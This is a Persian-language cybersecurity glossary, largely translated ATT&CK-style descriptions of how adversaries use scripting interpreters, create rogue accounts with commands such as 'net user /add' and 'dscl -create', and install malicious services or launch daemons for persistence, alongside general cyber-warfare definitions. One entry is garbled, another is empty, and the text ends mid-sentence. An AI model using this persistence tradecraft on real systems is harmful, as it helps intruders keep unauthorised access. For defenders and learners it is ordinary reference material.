ممکن است دشمنان از دستورات و اسکریپت های PowerShell برای اجرا سوء استفاده کنند. PowerShell یک رابط خط فرمان و محیط اسکریپت تعاملی قدرتمند است که در سیستم عامل ویندوز گنجانده شده است. دشمنان می توانند از PowerShell برای انجام تعدادی از اقدامات از جمله کشف اطلاعات و اجرای کد استفاده کنند. مثلاً cmdlet Start-Process که می تواند برای اجرای یک فایل اجرایی استفاده شود و cmdlet Invoke-Command که یک فرمان را به صورت محلی یا روی یک کامپیوتر راه دور اجرا می کند (اگرچه مجوزهای سرپرست برای استفاده از PowerShell برای اتصال به سیستم های راه دور مورد نیاز است).

مترجم دستورات و اسکریپت: AppleScript

Command and Scripting Interpreter: AppleScript

ممکن است دشمنان از AppleScript برای اجرا سوءاستفاده کنند. AppleScript یک زبان برنامه نویسی macOS است که برای کنترل برنامه‌ها و بخش‌هایی از سیستم عامل از طریق پیام‌های بین برنامه‌ای به نام AppleEvents طراحی شده است. این پیام‌های AppleEvent را می‌توان به طور مستقل ارسال کرد یا به راحتی با AppleScript اسکریپت کرد. این رویدادها می‌توانند پنجره‌های باز را تعیین مکان کنند، کلیدها را ارسال کنند و تقریباً با هر برنامه‌ای باز شده به صورت محلی یا از راه دور تعامل داشته باشند.

مترجم دستورات و اسکریپت: Windows Command Shell

Command and Scripting Interpreter: Windows Command Shell

ممکن است دشمنان از پوسته فرمان ویندوز برای اجرا سوء استفاده کنند. پوسته فرمان ویندوز (cmd) خط فرمان اولیه در سیستم های ویندوز است. خط فرمان ویندوز را می توان برای کنترل تقریباً هر جنبه ای از یک سیستم، با سطوح مختلف مجوز مورد نیاز برای زیر مجموعه های مختلف دستورات استفاده کرد. خط فرمان را می توان از راه دور از طریق سرویس های راه دور مانند SSH فراخوانی کرد. فایل‌های دسته‌ای (به عنوان مثال: bat یا cmd) همچنین فهرستی از دستورات متوالی برای اجرا و همچنین عملیات برنامه‌نویسی معمولی مانند شرطی‌ها و حلقه‌ها را در اختیار پوسته قرار می‌دهند. کاربردهای رایج فایل‌های دسته‌ای شامل کارهای طولانی یا تکراری یا نیاز به اجرای مجموعه‌ای از دستورات روی چندین سیستم است. دشمنان ممکن است از cmd برای اجرای دستورات مختلف استفاده کنند. کاربردهای متداول عبارتند از cmd برای اجرای یک فرمان، یا سوء استفاده از cmd به صورت تعاملی با ورودی و خروجی ارسال شده از طریق یک کانال فرمان و کنترل.

مترجم دستورات و اسکریپت: Unix Shell

Command and Scripting Interpreter: Unix Shell

دشمنان ممکن است از دستورات و اسکریپت‌های پوسته یونیکس برای اجرا سوءاستفاده کنند. پوسته‌های یونیکس خط فرمان اولیه در سیستم‌های لینوکس و macOS هستند، اگرچه انواع مختلفی از پوسته یونیکس (مانند sh، bash، zsh، و غیره) بسته به سیستم‌عامل یا توزیع خاص وجود دارد. پوسته های یونیکس می توانند تمام جنبه‌های یک سیستم را کنترل کنند، با دستورات خاصی که به امتیازات بالا نیاز دارند. پوسته‌های یونیکس همچنین از اسکریپت‌هایی پشتیبانی می کنند که اجرای متوالی دستورات و همچنین سایر عملیات برنامه نویسی معمولی مانند شرطی‌ها و حلقه‌ها را امکان‌پذیر می‌کنند. استفاده‌های رایج از اسکریپت‌های پوسته شامل کارهای طولانی یا تکراری یا نیاز به اجرای مجموعه‌ای از دستورات روی چندین سیستم است. دشمنان ممکن است از پوسته های یونیکس برای اجرای دستورات یا بارهای مختلف سوء استفاده کنند. پوسته های تعاملی ممکن است از طریق کانال های فرمان و کنترل یا در حین حرکت جانبی مانند SSH قابل دسترسی باشند. دشمنان همچنین ممکن است از اسکریپت های پوسته برای ارائه و اجرای دستورات متعدد بر روی قربانیان یا به عنوان بخشی از بارهای استفاده شده برای پایداری استفاده کنند.

مترجم دستورات و اسکریپت: ویژوال بیسیک

Command and Scripting Interpreter: Visual Basic

دشمنان ممکن است از ویژوال بیسیک ( VB) برای اجرا سوءاستفاده کنند. VB یک زبان برنامه نویسی است که توسط مایکروسافت با قابلیت همکاری با بسیاری از فناوری‌های ویندوز مانند Component Object Model و Native API از طریق Windows API ایجاد شده است. اگرچه VB به‌عنوان میراث و بدون هیچ گونه تکامل برنامه‌ریزی‌شده در آینده برچسب‌گذاری شده است، اما VB در NET Framework و کراس پلتفرم.NET Core یکپارچه و پشتیبانی می‌شود. زبان های مشتق بر اساس VB نیز ایجاد شده‌اند، مانند Visual Basic for Applications (VBA) و VBScript. VBA یک زبان برنامه نویسی رویداد محور است که در Microsoft Office و همچنین چندین برنامه شخص ثالث تعبیه شده است. VBA اسناد را قادر می سازد تا حاوی ماکروهایی باشند که برای خودکارسازی اجرای وظایف و سایر عملکردها در هاست استفاده می شوند. VBScript یک زبان برنامه نویسی پیش فرض در میزبان ویندوز است و همچنین می تواند به جای جاوا اسکریپت در صفحات وب برنامه HTML (HTA) که به اینترنت اکسپلورر ارائه می شود استفاده شود (اگرچه اکثر مرورگرهای مدرن با پشتیبانی VBScript ارائه نمی شوند). دشمنان ممکن است از payloadهای VB برای اجرای دستورات مخرب استفاده کنند. استفاده مخرب متداول شامل اجرای خودکار رفتارها با VBScript یا جاسازی محتوای VBA در محموله‌های Spearphishing Attachment است.

مترجم دستورات و اسکریپت: پایتون

Command and Scripting Interpreter: Python

ممکن است دشمنان از دستورات و اسکریپت‌های پایتون برای اجرا سوءاستفاده کنند. پایتون یک زبان برنامه نویسی/ اسکریپت نویسی بسیار محبوب است که قابلیت اجرای بسیاری از توابع را دارد. پایتون را می‌توان به صورت تعاملی از خط فرمان (از طریق مفسر ( python.exe) یا از طریق اسکریپت‌هایی (py) که می‌توان نوشت و در سیستم‌های مختلف توزیع کرد، اجرا کرد. کد پایتون را می توان در فایل های اجرایی باینری نیز کامپایل کرد. پایتون با بسیاری از بسته‌های داخلی برای تعامل با سیستم زیربنایی، مانند عملیات فایل و ورودی/خروجی دستگاه عرضه می‌شود. دشمنان می توانند از این کتابخانه ها برای دانلود و اجرای دستورات یا اسکریپت های دیگر و همچنین انجام رفتارهای مخرب مختلف استفاده کنند.

مترجم دستورات و اسکریپت: جاوا اسکریپت

Command and Scripting Interpreter: JavaScript

ممکن است دشمنان از پیاده سازی های مختلف جاوا اسکریپت برای اجرا سوء استفاده کنند. جاوا اسکریپت (JS) یک زبان برنامه نویسی مستقل از پلتفرم (کامپایل شده به موقع در زمان اجرا) است که معمولاً با اسکریپت ها در صفحات وب مرتبط است، اگرچه JS می‌تواند در محیط‌های زمان اجرا خارج از مرورگر اجرا شود. عنوان بخشی از سازش Drive-by یا دانلود و اجرای این فایل‌های اسکریپت به عنوان بارهای ثانویه است. از آنجایی که این بارها مبتنی بر متن هستند، برای دشمنان نیز بسیار رایج است که محتوای خود را به عنوان بخشی از فایل‌های مبهم یا اطلاعات مبهم کنند.

مترجم دستورات و اسکریپت: CLI دستگاه شبکه

Command and Scripting Interpreter: Network Device CLI

دشمنان ممکن است از اسکریپت یا مفسرهای داخلی خط فرمان (CLI) در دستگاه‌های شبکه برای اجرای دستورات مخرب و بارهای پرداختی سوء استفاده کنند. CLI ابزار اولیه ای است که از طریق آن کاربران و مدیران با دستگاه به منظور مشاهده اطلاعات سیستم، اصلاح عملیات دستگاه یا انجام عملکردهای تشخیصی و اداری تعامل دارند. CLIها معمولاً شامل سطوح مختلف مجوز مورد نیاز برای دستورات مختلف هستند. مفسرهای اسکریپت وظایف را خودکار می کنند و عملکرد را فراتر از مجموعه دستورات موجود در سیستم عامل شبکه گسترش می دهند. CLI و مفسر اسکریپت از طریق اتصال مستقیم کنسول یا از طریق راه‌های راه دور مانند telnet یا SSH قابل دسترسی هستند. دشمنان می توانند از CLI شبکه برای تغییر نحوه رفتار و عملکرد دستگاه‌های شبکه استفاده کنند. CLI ممکن است برای دستکاری جریان های ترافیکی برای رهگیری یا دستکاری داده‌ها، تغییر پارامترهای پیکربندی راه اندازی برای بارگیری نرم افزارهای مخرب سیستم، یا غیرفعال کردن ویژگی‌های امنیتی یا ثبت گزارش برای جلوگیری از شناسایی استفاده شود.

فرماندهی اداره کانتینر

Container Administration Command

ممکن است دشمنان از یک سرویس مدیریت کانتینر برای اجرای دستورات درون یک کانتینر سوء استفاده کنند. یک سرویس مدیریت کانتینر مانند Daemon Docker، سرور Kubernetes API یا kubelet ممکن است امکان مدیریت از راه دور کانتینرها را در یک محیط فراهم کند. درDocker، دشمنان ممکن است یک نقطه ورودی را در طول استقرار کانتینر مشخص کنند که یک اسکریپت یا دستور را اجرا می‌کند، یا ممکن است از دستوری مانند docker exec برای اجرای یک فرمان در یک کانتینر در حال اجرا استفاده کنند. در Kubernetes، اگر حریف مجوزهای کافی داشته باشد، ممکن است از طریق تعامل با سرور Kubernetes API، kubelet یا با اجرای دستوری مانند kubectl exec، از راه دور در یک کانتینر در خوشه اجرا شود.

تعقیب سایبری

cyber pursuit

شکار روبنده مشکلات در مورد تهدیدات امنیت سایبری و کشف آسیب‌پذیری‌ها.

مراقبت سایبری

Cyber surveillance

مراقبت سایبری مکانیزمی برای نظارت بر افراد، اشیاء یا فرآیندها است که مبتنی بر فناوری‌های جدید هستند و از شبکه‌های داده مانند اینترنت و... اداره می‌شوند. هدف آن تسهیل نظارت، مطابق با کمیت، سرعت یا پیچیدگی داده هایی است که قرار است پردازش شوند.

رصد و پایش سایبری

Cyber monitoring

نظارت بر تهدیدات امنیت سایبری فرآیند شناسایی تهدیدات سایبری و نقض داده ها را توصیف می کند. نظارت بر زیرساخت‌های فناوری اطلاعات بخش مهمی از مدیریت ریسک سایبری است که سازمان‌ها را قادر می‌سازد حملات سایبری را در مراحل ابتدایی شناسایی کرده و قبل از ایجاد آسیب و اختلال به آنها پاسخ دهند. نظارت مستمر یا 24×7 امنیت سایبری از طریق یک ارائه دهنده خدمات امنیتی با تجربه می تواند هشدارهای تهدید را به شدت بهبود بخشد و کمک کند تا زمان بیشتری برای استراتژی های امنیتی صرف شود. همانطور که محل کارهای مدرن به طور فزاینده ای متمرکز بر ابر و دیجیتالی می شوند، محیط سنتی شبکه تار می‌شود. تهدیدات سایبری برای استفاده از آسیب‌پذیری‌های جدیدی که روزانه ظاهر می‌شوند در حال تکامل هستند. در حالی که فناوری امنیتی پیشگیرانه قادر به تهدیدهای مبتنی بر امضای شناخته شده است، نظارت بر تهدیدات امنیت سایبری برای شناسایی تهدیدهای پیچیده تری که از این کنترل ها دور می شوند، مورد نیاز است. نظارت مستمر امنیت سایبری به سازمان ها کمک می کند: طیف وسیع تری از تهدیدات را شناسایی کنید زمان پاسخگویی به حملات را کاهش دهید مطابق با صنعت و الزامات نظارتی

کشف سایبری

Cyber Security discovery

کشف داده ها شامل شناسایی و مکان یابی داده های حساس یا تنظیم شده برای محافظت کافی یا حذف ایمن آن‌ها می‌شود. یکی از بزرگ‌ترین روندهای هوش تجاری در سال‌های اخیر، کشف داده‌ها، برای بسیاری از تیم‌های امنیتی سازمانی اولویت دارد، زیرا یک جزء حیاتی در آمادگی برای انطباق است. کشف داده شامل ممیزی اطلاعات حساس یا تنظیم‌شده، از جمله داده‌های محرمانه یا اختصاصی و همچنین داده‌های محافظت‌شده مانند اطلاعات شناسایی شخصی (PII) یا اطلاعات سلامت الکترونیکی محافظت‌شده (ePHI) است. کشف داده ها تیم های امنیتی را قادر می سازد تا این اطلاعات را شناسایی کنند تا از آن محافظت کنند و از محرمانه بودن، یکپارچگی و در دسترس بودن آن اطمینان حاصل کنند. مزایای کشف داده ها و راه حل های امنیتی آگاه از زمینه بسیار گسترده است و شامل موارد زیر است: بهبود فرآیند درک اطلاعاتی که شرکت در اختیار دارد، کجا ذخیره می‌شود، چه کسی می‌تواند به آن دسترسی داشته باشد و کجا و چگونه منتقل می‌شود. اعمال طبقه بندی های از پیش تعریف شده و سیاست های حفاظتی برای داده های سازمانی. نظارت مستمر و جامع بر دسترسی و فعالیت داده ها. طبقه بندی خودکار داده ها بر اساس زمینه. مدیریت ریسک و رعایت مقررات. مشاهده کامل داده ها شناسایی، طبقه بندی و ردیابی داده های حساس. توانایی اعمال کنترل های حفاظتی بر روی داده ها در زمان واقعی بر اساس از پیش تعریف شده. سیاست‌ها و عوامل زمینه ای

درگیری سایبری

Cyber conflict

تعریف ما از درگیری سایبری استفاده از فناوری‌های محاسباتی است که به عنوان استفاده از ریزپردازنده‌ها و سایر فناوری‌های مرتبط در فضای سایبری برای اهداف بدخواهانه و یا مخرب به‌منظور تأثیر، تغییر یا اصلاح تعاملات دیپلماتیک و نظامی بین نهادها تعریف می‌شود.

ضربه زدن سایبری

Cyber tapping

نبرد سایبری

Cyber Battle

میدان نبرد سایبری مکانی است شامل باگ ها و ویروس ها که باید با انها مبارزه کرد. سه سلاح برای میدان نبرد سایبری وجود دارد: بیومتریک، آموزش، مشارکت های جهانی که به کشورها و سازمان ها کمک می کند تا از شبکه های خود محافظت کنند. مجرمان سایبری از هر زاویه به اهداف خود حمله می کنند. در زمانی که مردم در مضیقه‌تر هستند، کشورها و سازمان‌ها باید دائماً مراقب باشند تا از تلاش‌های مخرب برای سرقت پول یا اطلاعات ارزشمند جلوگیری کنند. سه ابزار فناوری وجود دارد که می تواند به افزایش امنیت سایبری کمک کند: بیومتریک، تجزیه و تحلیل و هوش مصنوعی. جایگزینی رمزهای عبور با تأییدهای بیومتریک می تواند به ویژه در برابر تهدیدات مهندسی اجتماعی مفید باشد. این نوع حملات معمولاً از طریق مکالمه شخصی به جستجوی رمز عبور می‌پردازند، اما ویژگی‌های انسانی مانند اثر انگشت، ویژگی‌های صورت و راه رفتن غیرممکن است و به سختی می‌توان آن را تکرار کرد. لازم به ذکر است احراز هویت بدون رمز عبور واقعاً احتمال خطر امنیتی و اعتبار را کاهش می دهد. احراز هویت بیومتریک فقط به ویژگی های فیزیکی محدود نمی شود. ابزارهای بیومتریک رفتاری می توانند الگوهای ظریفی را که کاربران حتی ممکن است از آنها آگاه نباشند، تشخیص دهند. به عنوان مثال، مجرمان سایبری که با برنامه های کامپیوتری آشنایی کامل دارند، می توانند زمانی که از میانبر صفحه کلید غیر معمول استفاده می کنند، خود را تسلیم کنند. صدا، موقعیت جغرافیایی و دستگاه همچنین می توانند به کارکنان امنیتی در شناسایی جعل هویت افراد کمک کنند. بسیاری از پاسخ‌های دفاع سایبری می‌توانند خودکار باشند، که برای مقابله تیم‌های امنیتی با تعداد فزاینده‌ای از تهدیدات مفید خواهد بود. در حالت ایده‌آل، زمانی که تهدیدها گزارش می‌شوند، بلافاصله توسط انسان‌ها ارزیابی می‌شوند، اما «این در دنیای واقعی اتفاق نمی‌افتد، مگر اینکه بودجه امنیتی زیادی داشته باشید که اکثر سازمان‌ها ندارند». آموزش و آگاهی شرکت ها باید از کارمندان به عنوان "چشم و گوش" خود در زمین استفاده کنند. اگرچه تیم‌های امنیتی نمی‌توانند با کار از راه دور همه چیز را در شبکه‌شان ببینند، اما می‌توانند کارمندان را وادار کنند که ایمیل‌های مشکوک را هنگام باز شدن پرچم‌گذاری کنند. همین اصل به اقدامات ملی علیه ایمیل های جعلی نیز تعمیم می یابد. مهمترین بخش آموزش و افزایش آگاهی کارکنان است تا بدانند از نظر تهدیدها با چه چیزی سر و کار دارند و در هنگام حمله چه باید بکنند. به اشتراک گذاری اطلاعات به اشتراک گذاری اطلاعات کاری است که مجرمان سایبری آن را به خوبی انجام می دهند، اما کارمندان شرکتها یا سازمانها "به همین اندازه یا به خوبی انجام نمی دهند". این واقعاً برای افرادی که تلاش می‌کنند از سیستم‌ها دفاع کنند یک ضرر است، زیرا انها نمی‌دانند تهدیدات چیست.

جنگ سایبری

Cyber warfare

تعریف عمومی پذیرفته شده جنگ سایبری استفاده از حملات سایبری علیه یک دولت-ملت است که باعث آسیب‌های قابل توجهی از جمله جنگ فیزیکی، اختلال در سیستم های کامپیوتری حیاتی و تلفات جانی می شود. با این حال، در مورد اینکه چه اقداماتی به طور خاص به عنوان جنگ سایبری واجد شرایط هستند، بحث هایی در میان کارشناسان وجود داشته است. در حالی که وزارت دفاع ایالات متحده (DOD) بیان می کند که استفاده از رایانه و اینترنت برای انجام جنگ در فضای سایبری تهدیدی برای امنیت ملی است. اگرچه جنگ سایبری به طور کلی به حملات سایبری انجام شده توسط یک دولت-ملت به کشور دیگر اشاره دارد، اما می‌تواند حملات گروه‌های تروریستی یا گروه‌های هکر با هدف پیشبرد اهداف کشورهای خاص را نیز توصیف کند.

نرم افزار باینری Compromise Client

Compromise Client Software Binary

دشمنان ممکن است باینری های نرم افزار مشتری را برای ایجاد دسترسی دائمی به سیستم ها تغییر دهند. نرم افزار کلاینت به کاربران امکان دسترسی به خدمات ارائه شده توسط سرور را می دهد. انواع نرم افزارهای مشتری رایج عبارتند از کلاینت های SSH، کلاینت های FTP، کلاینت های ایمیل و مرورگرهای وب. هنگامی که آن برنامه ها در حال استفاده هستند، دشمنان ممکن است تغییراتی در باینری های نرم افزار مشتری برای انجام کارهای مخرب ایجاد کنند. به عنوان مثال، یک دشمن ممکن است کد منبع نرم افزار مشتری را کپی کند، یک درب پشتی اضافه کند، برای هدف کامپایل کند، و باینری برنامه قانونی (یا فایل های پشتیبانی) را با درپشتی جایگزین کند. از آنجایی که این برنامه ها ممکن است به طور معمول توسط کاربر اجرا شوند، حریف می تواند از آن برای دسترسی دائمی به میزبان استفاده کند.

ایجاد حساب کاربری

Create Account

دشمنان ممکن است یک حساب کاربری برای حفظ دسترسی به سیستم های قربانی ایجاد کنند. با سطح دسترسی کافی، ایجاد چنین حساب‌هایی ممکن است برای ایجاد دسترسی ثانویه اعتباری که نیازی به ابزارهای دسترسی از راه دور دائمی برای استقرار در سیستم ندارند، استفاده شود. حساب‌ها ممکن است در سیستم محلی یا در یک دامنه یا مستاجر ابری ایجاد شوند. در محیط های ابری، دشمنان ممکن است حساب هایی ایجاد کنند که فقط به خدمات خاصی دسترسی داشته باشند، که می تواند شانس شناسایی را کاهش دهد.

ایجاد حساب: حساب محلی

Create Account: Local Account

دشمنان ممکن است یک حساب محلی برای حفظ دسترسی به سیستم های قربانی ایجاد کنند. حساب‌های محلی آنهایی هستند که توسط یک سازمان برای استفاده توسط کاربران، پشتیبانی از راه دور، خدمات یا برای مدیریت در یک سیستم یا سرویس واحد پیکربندی شده‌اند. با سطح دسترسی کافی، دستور net user /add را می توان برای ایجاد یک حساب محلی استفاده کرد. در سیستم‌های macOS می‌توان از دستور dscl –create برای ایجاد یک حساب محلی استفاده کرد. چنین حساب‌هایی ممکن است برای ایجاد دسترسی ثانویه اعتباری که نیازی به ابزارهای دسترسی از راه دور دائمی برای استقرار در سیستم ندارند، استفاده شوند.

ایجاد حساب: حساب دامنه

Create Account: Domain Account

دشمنان ممکن است یک حساب دامنه برای حفظ دسترسی به سیستم های قربانی ایجاد کنند. حساب‌های دامنه آنهایی هستند که توسط Active Directory Domain Services مدیریت می‌شوند که دسترسی و مجوزها در سیستم‌ها و سرویس‌هایی که بخشی از آن دامنه هستند پیکربندی می‌شوند. حساب های دامنه می توانند حساب‌های کاربر، سرپرست و سرویس را پوشش دهند. با سطح دسترسی کافی، دستور net user /add /domain را می توان برای ایجاد یک حساب دامنه استفاده کرد. چنین حساب‌هایی ممکن است برای ایجاد دسترسی ثانویه اعتباری که نیازی به ابزارهای دسترسی از راه دور دائمی برای استقرار در سیستم ندارند، استفاده شوند.

ایجاد حساب: حساب ابری

Create Account: Cloud Account

دشمنان ممکن است یک حساب ابری برای حفظ دسترسی به سیستم های قربانی ایجاد کنند. با سطح دسترسی کافی، چنین حساب‌هایی ممکن است برای ایجاد دسترسی ثانویه اعتباری که نیازی به ابزارهای دسترسی از راه دور دائمی برای استقرار در سیستم ندارد، استفاده شوند.دشمنان ممکن است حساب هایی ایجاد کنند که فقط به خدمات ابری خاصی دسترسی داشته باشند، که می تواند شانس شناسایی را کاهش دهد.

ایجاد یا اصلاح فرآیند سیستم

Create or Modify System Process

دشمنان ممکن است فرآیندهای سطح سیستم را برای اجرای مکرر بارهای مخرب به عنوان بخشی از تداوم ایجاد یا تغییر دهند. هنگامی که سیستم عامل ها بوت می شوند، می توانند فرآیندهایی را شروع کنند که عملکردهای سیستم پس زمینه را انجام می دهند. در ویندوز و لینوکس، این فرآیندهای سیستمی به عنوان خدمات شناخته می شوند. در macOS، فرآیندهای راه‌اندازی به نام Launch Daemon و Launch Agent برای تکمیل اولیه‌سازی سیستم و بارگیری پارامترهای خاص کاربر اجرا می‌شوند.دشمنان ممکن است سرویس‌ها، دیمون‌ها یا عوامل جدیدی را نصب کنند که می‌توانند برای اجرا در هنگام راه‌اندازی یا یک بازه زمانی قابل تکرار پیکربندی شوند تا پایداری ایجاد کنند. به طور مشابه، دشمنان ممکن است خدمات، دیمون ها یا عوامل موجود را برای دستیابی به همان اثر تغییر دهند. سرویس‌ها، دیمون‌ها یا عوامل ممکن است با امتیازات مدیر ایجاد شوند اما تحت امتیازات root/SYSTEM اجرا شوند. دشمنان ممکن است از این عملکرد برای ایجاد یا اصلاح فرآیندهای سیستم به منظور افزایش امتیازات استفاده کنند.

ایجاد یا اصلاح فرآیند سیستم: عامل راه اندازی

Create or Modify System Process: Launch Agent

دشمنان ممکن است عوامل راه‌اندازی را برای اجرای مکرر بارهای مخرب به عنوان بخشی از تداوم ایجاد یا تغییر دهند.

ایجاد یا اصلاح فرآیند سیستم: سرویس Systemd

Create or Modify System Process: Systemd Service

دشمنان ممکن است خدمات سیستمی را برای اجرای مکرر بارهای مخرب به عنوان بخشی از تداوم ایجاد یا تغییر دهند. مدیر سرویس systemd معمولاً برای مدیریت فرآیندهای شبح پس‌زمینه (همچنین به عنوان سرویس‌ها شناخته می‌شود) و سایر منابع سیستم استفاده می‌شود Systemd سیستم اولیه (init) پیش‌فرض در بسیاری از توزیع‌های لینوکس است که با Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15شروع می‌شود و جایگزین سیستم‌های init قدیمی از جمله SysVinit و Upstart می‌شود در حالی که با سیستم‌های init فوق‌الذکر سازگار است.

ایجاد یا اصلاح فرآیند سیستم: سرویس ویندوز

Create or Modify System Process: Windows Service

دشمنان ممکن است سرویس‌های ویندوز را برای اجرای مکرر بارهای مخرب به عنوان بخشی از تداوم ایجاد یا تغییر دهند. وقتی ویندوز بوت می‌شود، برنامه‌ها یا برنامه‌هایی به نام سرویس‌ها را راه‌اندازی می‌کند که عملکردهای سیستم پس‌زمینه را انجام می‌دهند. اطلاعات پیکربندی سرویس ویندوز، از جمله مسیر فایل به برنامه ها/فرمان های اجرایی یا بازیابی سرویس، در رجیستری ویندوز ذخیره می شود. تنظیمات سرویس را می توان با استفاده از ابزارهایی مانند sc.exe و Reg تغییر داد. دشمنان ممکن است با استفاده از ابزارهای سیستمی برای تعامل با سرویس‌ها، با تغییر مستقیم رجیستری یا با استفاده از ابزارهای سفارشی برای تعامل با Windows API، یک سرویس جدید نصب کنند یا یک سرویس موجود را تغییر دهند. دشمنان ممکن است سرویس‌ها را برای اجرا در هنگام راه‌اندازی پیکربندی کنند تا در یک سیستم تداوم داشته باشند. حریف همچنین ممکن است با استفاده از نام سرویس از یک سیستم عامل مرتبط یا نرم‌افزار خوش‌خیم، یا با تغییر سرویس‌های موجود برای چالش‌برانگیزتر کردن تجزیه‌وتحلیل تشخیص، Masquerading را وارد کند. تغییر سرویس‌های موجود ممکن است عملکرد آنها را مختل کند یا ممکن است سرویس‌هایی را که غیرفعال شده‌اند یا معمولاً استفاده نمی‌شوند فعال کند. سرویس‌ها ممکن است با امتیازات سرپرست ایجاد شوند اما تحت امتیازات SYSTEM اجرا می‌شوند، بنابراین دشمن ممکن است از سرویسی برای افزایش امتیازات از مدیر به SYSTEM استفاده کند. همچنین ممکن است دشمنان مستقیماً خدمات را از طریق Service Execution شروع کنند.

ایجاد یا اصلاح فرآیند سیستم: راه اندازی Daemon

Create or Modify System Process: Launch Daemon

دشمنان ممکن است Launch Daemons را برای اجرای بارهای مخرب به عنوان بخشی از پایداری ایجاد یا تغییر دهند. Launch Daemons فایل‌های plist هستند که برای تعامل با Launchd، چارچوب مدیریت خدمات مورد استفاده توسط macOS استفاده می‌شوند. Launch Daemons برای نصب به امتیازات بالایی نیاز دارد، برای هر کاربر در یک سیستم قبل از ورود به سیستم اجرا می شود و بدون نیاز به تعامل کاربر در پس زمینه اجرا می شود. در طول راه‌اندازی اولیه macOS، فرآیند راه‌اندازی شده، پارامترهای مربوط به راه‌اندازی در سطح سیستم را از فایل‌های plist موجود در /System/Library/LaunchDaemons/ و /Library/LaunchDaemons/ بارگیری می‌کند. پارامترهای مورد نیاز Launch Daemons شامل یک برچسب برای شناسایی کار، برنامه برای ارائه مسیری به فایل اجرایی و RunAtLoad برای تعیین زمان اجرای وظیفه است. Launch Daemon اغلب برای دسترسی به منابع مشترک، به روز رسانی نرم افزار، یا انجام وظایف اتوماسیون استفاده می شود. دشمنان ممکن است یک Launch Daemon را نصب کنند که برای اجرا در هنگام راه اندازی با استفاده از پارامتر RunAtLoad روی true و پارامتر Program در مسیر اجرایی مخرب تنظیم شده است. نام دیمون ممکن است با استفاده از نامی از یک سیستم عامل مرتبط یا نرم افزار خوش خیم (به عنوان مثال ( Masquerading) پنهان شود. هنگامی که Launch Daemon اجرا می شود، برنامه مجوزهای اداری را به ارث می برد. علاوه بر این، تغییرات پیکربندی سیستم (مانند نصب نرم افزار مدیریت بسته شخص ثالث) ممکن است باعث شود پوشه هایی مانند usr/local/bin به صورت جهانی قابل نوشتن باشند. بنابراین، این امکان وجود دارد که پیکربندی‌های ضعیف به دشمن اجازه دهد تا فایل‌های اجرایی ارجاع‌شده توسط فایل‌های plist Launch Daemon را تغییر دهد.

قدرت سایبری

Cyber power

قدرت سایبری توانایی سازمان یافته جامعه برای استفاده از فناوری دیجیتال برای نظارت، بهره برداری، براندازی و اجبار در درگیری های بین المللی است. همه اینها را می توان از طریق استفاده هوشمندانه از فناوری دیجیتال و بدون استقرار نیروهای نظامی یا جاسوسان انسانی انجام داد.

رزم سایبری

Cyber warfare

رزم سایبری معمولاً به عنوان یک حمله سایبری یا مجموعه ای از حملات که یک کشور را هدف قرار می دهد تعریف می شود و این پتانسیل را دارد که زیرساخت‌های دولتی و غیرنظامی را ویران کند و سیستم‌های حیاتی را مختل کند و در نتیجه به دولت آسیب وارد کند و حتی جان افراد را از دست بدهد.

تمرین سایبری

Cyber Exercise

یک تمرین سایبری واکنش رویداد یک سازمان را آزمایش می کند. آنها بر تأثیر کسب و کار تمرکز می کنند و می‌توانند به عنوان آزمونی برای افراد و فرآیندها در نظر گرفته شوند. آنها به سازمان ها اجازه می دهند تا رویه‌های واکنش به حادثه خود را به شیوه ای ایمن و کنترل شده توسعه دهند و تمرین کنند.

حمله سایبری

cyber attack

حمله سایبری حمله ای است که توسط مجرمان سایبری با استفاده از یک یا چند رایانه علیه یک یا چند رایانه یا شبکه انجام می شود. یک حمله سایبری می‌تواند به طور مخرب رایانه‌ها را غیرفعال کند، داده‌ها را سرقت کند، یا از رایانه‌ای که نفوذ کرده است به عنوان نقطه راه‌اندازی برای حملات دیگر استفاده کند. مجرمان سایبری از روش‌های مختلفی برای حمله سایبری استفاده می‌کنند، از جمله بدافزار، فیشینگ، باج‌افزار، انکار سرویس و سایر روش‌ها.

درگیری سایبری

Cyber conflict

درگیریسایبری شامل اقدامات یک دولت-ملت یا سازمان بین‌المللی برای حمله و تلاش برای آسیب رساندن به رایانه‌ها یا شبکه‌های اطلاعاتی یک کشور دیگر از طریق، برای مثال، ویروس‌های رایانه‌ای یا حملات انکار سرویس است.

ایمنی سایبری

Cyber immunity

ایمنی سایبری مفهوم جدیدی است که در آن سیستم‌های ایمنی سایبری باید توانایی ذاتی برای مقاومت در برابر انواع حملات سایبری، از جمله عوامل عفونی جدید که برای راه‌حل‌های کلاسیک امنیت سایبری نامرئی هستند، داشته باشند.

اعتبار از فروشگاه های رمز عبور

Credentials from Password Stores

دشمنان ممکن است برای به دست آوردن اعتبار کاربری، مکان های ذخیره رمز عبور رایج را جستجو کنند. بسته به سیستم عامل یا برنامه ای که اعتبارنامه را در اختیار دارد، رمزهای عبور در چندین مکان در یک سیستم ذخیره می شوند. همچنین برنامه های خاصی وجود دارند که رمزهای عبور را ذخیره می کنند تا مدیریت و نگهداری را برای کاربران آسان تر کنند. پس از به دست آوردن اعتبار، می توان از آنها برای انجام حرکت جانبی و دسترسی به اطلاعات محدود استفاده کرد.

کشف زیرساخت ابری

Cloud Infrastructure Discovery

یک دشمن ممکن است سعی کند منابعی را که در یک محیط زیرساخت به عنوان سرویس (IaaS) در دسترس است، کشف کند. این شامل منابع خدمات محاسباتی مانند نمونه ها، ماشین های مجازی و عکس های فوری و همچنین منابع خدمات دیگر از جمله سرویس های ذخیره سازی و پایگاه داده می شود. ارائه دهندگان ابر روشهایی مانند API و دستورات صادر شده از طریق CLI را برای ارائه اطلاعات در مورد زیرساخت ارائه می دهند. به عنوان مثال، AWS یک API DescribeInstance را در آمازون EC2 APIارائه می‌کند که می‌تواند اطلاعات یک یا چند نمونه را در یک حساب بازگرداند، ListBuckets API که فهرستی از تمام سطل‌های متعلق به فرستنده تأیید شده درخواست را برمی‌گرداند، یا GetPublicAccessBlock API به پیکربندی بلوک دسترسی را برای یک سطل بازیابی کنید. به طور مشابه، GCP's Cloud SDK CLI دستور فهرست نمونه‌های محاسباتی gcloud را برای فهرست کردن تمام نمونه‌های موتور محاسباتی Google در یک پروژه ارائه می‌کند و دستور CLI az vm لیست جزئیات ماشین‌های مجازی را فهرست می‌کند. حریف ممکن است منابعی را با استفاده از کلیدهای دسترسی کاربر در معرض خطر شمارش کند تا مشخص کند کدام یک در دسترس آن کاربر است. کشف این منابع موجود ممکن است به دشمنان کمک کند تا مراحل بعدی خود را در محیط Cloud تعیین کنند، مانند ایجاد 